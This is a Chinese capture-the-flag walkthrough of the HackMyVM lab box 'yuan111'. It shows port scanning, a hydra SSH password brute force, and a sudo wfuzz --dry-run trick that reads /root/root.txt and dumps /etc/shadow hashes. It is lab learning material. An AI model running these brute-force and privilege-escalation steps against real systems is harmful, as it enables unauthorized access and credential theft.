HackMyVM - yuan111 靶机渗透记录 环境与目标 靶机IP:192.168.56.110 暴露服务:22/tcp、80/tcp 目标:从 Web 入口拿到普通用户 shell,再进一步提权到 root 一、信息收集 1. 端口扫描 nmap -p 1-65535 -T4 -A -v 192.168.56.110 PORT STATE SERVICE VERSION 22/tcp open ssh Ope…
可以确认普通用户为 tao。结合首页给的 rockyou 提示,这里基本可以判断接下来要对 tao 的 SSH 凭据进行字典爆破。
三、获取初始 shell
直接用 hydra 配合 rockyou.txt 对 SSH 进行爆破:
hydra -l tao -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.110 -t 4 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-04 11:17:24 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking ssh://192.168.56.110:22/ [22][ssh] host: 192.168.56.110 login: tao password: rockyou 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-04 11:17:44
成功爆破出密码 rockyou,直接 SSH 登入 tao 用户,拿到普通用户 shell:
四、权限提升
拿到普通用户权限后,先查看 sudo 权限:
可以看到 tao 能够无密码使用 wfuzz 和 id 两个命令。先在 gtfobins 上查找直接利用方式,没有现成的提权路径,需要自己挖掘。
id 只是用来查看当前用户的权限信息,没有可利用点,所以重点放在 wfuzz 上。wfuzz 支持插件扩展,但实际操作时发现:
sudo wfuzz --dry-run -w /root/root.txt http://127.0.0.1/FUZZ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://127.0.0.1/FUZZ Total requests: 1 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000001: 0 0 L 0 W 0 Ch "flag{xxxx}" Total time: 0 Processed Requests: 1 Filtered Requests: 0 Requests/sec.: 0
sudo wfuzz --dry-run -w /etc/shadow http://127.0.0.1/FUZZ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://127.0.0.1/FUZZ Total requests: 26 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000001: 0 0 L 0 W 0 Ch "root:$6$N2l0GYAc2HyLxS2d$Ks1awHW0JPPVXft/ZpvptPLmh/P/XiBRqH8G1uTjpDhrLHUwmN2PK8.MqQcrIwSXf2CGxk.ue11f9hZzZdtkw1: 20460:0:99999:7:::" 000000007: 0 0 L 0 W 0 Ch "man:*:20166:0:99999:7:::" 000000025: 0 0 L 0 W 0 Ch "sshd:*:20166:0:99999:7:::" 000000017: 0 0 L 0 W 0 Ch "gnats:*:20166:0:99999:7:::" 000000018: 0 0 L 0 W 0 Ch "nobody:*:20166:0:99999:7:::" 000000005: 0 0 L 0 W 0 Ch "sync:*:20166:0:99999:7:::" 000000004: 0 0 L 0 W 0 Ch "sys:*:20166:0:99999:7:::" 000000002: 0 0 L 0 W 0 Ch "daemon:*:20166:0:99999:7:::" 000000008: 0 0 L 0 W 0 Ch "lp:*:20166:0:99999:7:::" 000000009: 0 0 L 0 W 0 Ch "mail:*:20166:0:99999:7:::" 000000010: 0 0 L 0 W 0 Ch "news:*:20166:0:99999:7:::" 000000011: 0 0 L 0 W 0 Ch "uucp:*:20166:0:99999:7:::" 000000013: 0 0 L 0 W 0 Ch "www-data:*:20166:0:99999:7:::" 000000012: 0 0 L 0 W 0 Ch "proxy:*:20166:0:99999:7:::" 000000006: 0 0 L 0 W 0 Ch "games:*:20166:0:99999:7:::" 000000016: 0 0 L 0 W 0 Ch "irc:*:20166:0:99999:7:::" 000000026: 0 0 L 0 W 0 Ch "tao:$6$kmyokhFHIyX4L4CM$74nCV6cf4jjTh3wLZb6EzTZ5efutQIUxTjfunweiLTcxLnJcqQGIumpKjSkU7yqxhJl5cs9ebmDtMMXgFcQyI1:2 0460:0:99999:7:::" 000000020: 0 0 L 0 W 0 Ch "systemd-timesync:*:20166:0:99999:7:::" 000000019: 0 0 L 0 W 0 Ch "_apt:*:20166:0:99999:7:::" 000000021: 0 0 L 0 W 0 Ch "systemd-network:*:20166:0:99999:7:::" 000000022: 0 0 L 0 W 0 Ch "systemd-resolve:*:20166:0:99999:7:::" 000000023: 0 0 L 0 W 0 Ch "systemd-coredump:!!:20166::::::" 000000024: 0 0 L 0 W 0 Ch "messagebus:*:20166:0:99999:7:::" 000000003: 0 0 L 0 W 0 Ch "bin:*:20166:0:99999:7:::" 000000015: 0 0 L 0 W 0 Ch "list:*:20166:0:99999:7:::" 000000014: 0 0 L 0 W 0 Ch "backup:*:20166:0:99999:7:::" Total time: 0 Processed Requests: 26 Filtered Requests: 0 Requests/sec.: 0
留言通道